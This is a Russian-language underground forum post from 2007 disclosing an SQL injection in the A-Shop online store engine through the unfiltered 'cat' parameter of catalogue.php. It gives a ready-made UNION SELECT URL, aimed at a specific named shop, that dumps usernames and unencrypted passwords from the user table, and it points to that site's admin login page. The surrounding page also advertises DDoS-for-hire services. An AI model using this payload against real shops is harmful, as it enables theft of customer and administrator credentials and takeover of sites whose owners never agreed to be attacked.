Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


уязвимость движка A-Shop

Автор aka PSIH , 24 Nov 2007 08:23

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
aka PSIH
Отправлено 24 November 2007 - 08:23

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
A-Shop - Версии: 4.4.1(возможно и более ранние) - 4.7.х(last)

SQL-инъекция с доступом в user и с незашифренными пасами.

Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.

http://www.the123d.com/shop/catalogue.php?cat=- 21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,27,28,29,30,31,32+from+user/*

Админка:
http://www.the123d.com/shop/admin/login.php

©Ky3bMu4
©http://forum.web-hack.ru
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
Обратно в Web уязвимости

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Underground
  3. Уязвимости и Сплойты
  4. Web уязвимости